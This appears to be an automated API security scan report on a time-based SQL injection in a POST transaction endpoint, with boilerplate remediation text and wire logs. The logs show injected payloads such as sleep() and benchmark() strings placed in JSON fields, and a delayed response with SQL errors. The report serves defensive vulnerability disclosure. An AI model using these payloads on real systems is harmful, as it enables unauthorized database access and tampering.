Title: SQL_Injection_Timebound Vulnerability on POST:/api/v1/primary-transaction
Project: Sanity 7th July
Description:
Assertion
Name: SQL Injection ( 1 )
Overview: SQL Injection is an Attack. It is executed by insertion or “Injection” of either partial or complete SQL query via query parameters, request body parameters, path parameters and passed to the application server/database.
Severity: SQL Injection is classified under the category of “Injection Attacks” by OWASP. “Injection Attacks” is consistently rated at Top 1 Category of Attack by OWASP in years 2010, 2013 and 2017 ( 2 ). SQL Injection is rated top 1 in the CWE / SANS Top 25 ( 3 ) ( 4 ).
Vulnerability Impact: A Successful SQL Injection attack
Can read sensitive data from the database
Can modify the database data thru Insert / Update / Delete statements
Can execute administrative operations on the database
Can recover the content of the given file existing on the database
Can write files into the file system
Can issue commands to the operating System
Exploitation: A successful SQL Injection attack is possible when the attacker crafts a syntactically Correct SQL Query. If an error is thrown back by the API by incorrect query, it will become much easier for the attacker to reconstruct the logic of the original query. If error is hidden, the attacker may have to reverse engineer for an exploitation. It might happen because of the following
User supplied data is NOT validated, filtered or sanitized by the application
Dynamic queries or non-parameterized calls without context-aware escaping
Remediation: A successful SQL Injection attack may possibly be avoided by Secure Coding Practices as outlined by OWASP SQL injection Prevention Cheat Sheet ( 5 ). The following are some of the techniques for remediating SQL Injection attacks.
Title: SQL_Injection_Timebound Vulnerability on POST:/api/v1/primary-transaction Project: Sanity 7th July Description:
Assertion Name: SQL Injection ( 1 )
Overview: SQL Injection is an Attack. It is executed by insertion or “Injection” of either partial or complete SQL query via query parameters, request body parameters, path parameters and passed to the application server/database.
Severity: SQL Injection is classified under the category of “Injection Attacks” by OWASP. “Injection Attacks” is consistently rated at Top 1 Category of Attack by OWASP in years 2010, 2013 and 2017 ( 2 ). SQL Injection is rated top 1 in the CWE / SANS Top 25 ( 3 ) ( 4 ).
Vulnerability Impact: A Successful SQL Injection attack
Risk: SQL_Injection_Timebound Severity: Critical API Endpoint: http://95.217.118.53:8080/api/v1/primary-transaction Environment: Master Playbook: ApiV1PrimaryTransactionPostBodyParamSqlInjectionTimebound Researcher: [apisec Bot]
QUICK TIPS
Suggestion: Effort Estimate: null Hrs Wire Logs: 00:46:02 [D] [AVPTPBPSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/primary-transaction] 00:46:02 [D] [AVPTPBPSITimebound] : Method [POST] 00:46:02 [D] [AVPTPBPSITimebound] : Authorization [Default] 00:46:02 [D] [AVPTPBPSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]] 00:46:02 [D] [AVPTPBPSITimebound] : Request [{ "amount" : "5060", "availableBalance" : "1905065973", "createdBy" : "", "createdDate" : "", "description" : "' OR sleep(7)=0; -- ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "' OR sleep(7)=0; -- ", "type" : "' OR sleep(7)=0; -- ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "' OR sleep(7)=0; -- ", "version" : "" }, "version" : "" }] 00:46:02 [D] [AVPTPBPSITimebound] : Status code [200] 00:46:02 [D] [AVPTPBPSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=OWFhM2ZkNjQtNzcxYS00YWNiLThmZmEtNjczNjIwMjk4OTlj; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Tue, 14 Sep 2021 00:46:02 GMT"]] 00:46:02 [D] [AVPTPBPSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-09-14T00:46:02.835+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:46:02 [D] [AVPTPBPSITimebound] : Response time [135442] 00:46:02 [D] [AVPTPBPSITimebound] : Response size [306] 00:46:02 [E] [AVPTPBPSITimebound] : Assertion [@ResponseTime < 7000] resolved-to [135442 < 7000] result [Failed] 00:46:02 [I] [AVPTPBPSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed] 00:46:03 [D] [AVPTPBPSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/primary-transaction] 00:46:04 [D] [AVPTPBPSITimebound] : Method [POST] 00:46:04 [D] [AVPTPBPSITimebound] : Authorization [Default] 00:46:04 [D] [AVPTPBPSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]] 00:46:04 [D] [AVPTPBPSITimebound] : Request [{ "amount" : "0825", "availableBalance" : "506433680", "createdBy" : "", "createdDate" : "", "description" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "type" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "version" : "" }, "version" : "" }] 00:46:04 [D] [AVPTPBPSITimebound] : Status code [200] 00:46:04 [D] [AVPTPBPSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=ZTY5MzE3OTEtNDQ1NC00Mzk5LWIzNzEtZDExMGJmNzA3Mzky; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Tue, 14 Sep 2021 00:46:03 GMT"]] 00:46:04 [D] [AVPTPBPSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-09-14T00:46:03.896+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:46:04 [D] [AVPTPBPSITimebound] : Response time [1043] 00:46:04 [D] [AVPTPBPSITimebound] : Response size [306] 00:46:04 [I] [AVPTPBPSITimebound] : Assertion [@ResponseTime < 7000] resolved-to [1043 < 7000] result [Passed] 00:46:04 [I] [AVPTPBPSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed] 00:46:04 [D] [AVPTPBPSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/primary-transaction] 00:46:04 [D] [AVPTPBPSITimebound] : Method [POST] 00:46:04 [D] [AVPTPBPSITimebound] : Authorization [Default] 00:46:04 [D] [AVPTPBPSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]] 00:46:04 [D] [AVPTPBPSITimebound] : Request [{ "amount" : "2727", "availableBalance" : "377611827", "createdBy" : "", "createdDate" : "", "description" : "' AND sleep(7)=0; -- ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "' AND sleep(7)=0; -- ", "type" : "' AND sleep(7)=0; -- ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "' AND sleep(7)=0; -- ", "version" : "" }, "version" : "" }] 00:46:04 [D] [AVPTPBPSITimebound] : Status code [200] 00:46:04 [D] [AVPTPBPSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=YmRjOWViOWUtYjc2Ni00NGJlLThhMmYtZjY1ODM1ZjU2YmU5; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Tue, 14 Sep 2021 00:46:04 GMT"]] 00:46:04 [D] [AVPTPBPSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-09-14T00:46:04.670+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:46:04 [D] [AVPTPBPSITimebound] : Response time [771] 00:46:04 [D] [AVPTPBPSITimebound] : Response size [306] 00:46:04 [I] [AVPTPBPSITimebound] : Assertion [@ResponseTime < 7000] resolved-to [771 < 7000] result [Passed] 00:46:04 [I] [AVPTPBPSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
IMPORTANT LINKS
Vulnerability Details: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/dashboard/8a8094e27bce7d6d017be1c4ad9133d4/details
Project: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/allScans
Environment: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/environments/8a8093567a8012b6017a803bf3181500/edit
Scan Dashboard: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/profiles/8a8093567a8012b6017a803c070d16cb/runs/8a8094e27bce7d6d017be1c0ae8030e8
Playbook: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/playbooks/ApiV1PrimaryTransactionPostBodyParamSqlInjectionTimebound
Coverage: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/categories
Code Sample: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/dashboard/8a8094e27bce7d6d017be1c4ad9133d4/codesamples
PS: Please contact support@apisec.ai for apisec access and login issues.
--- apisec Bot ---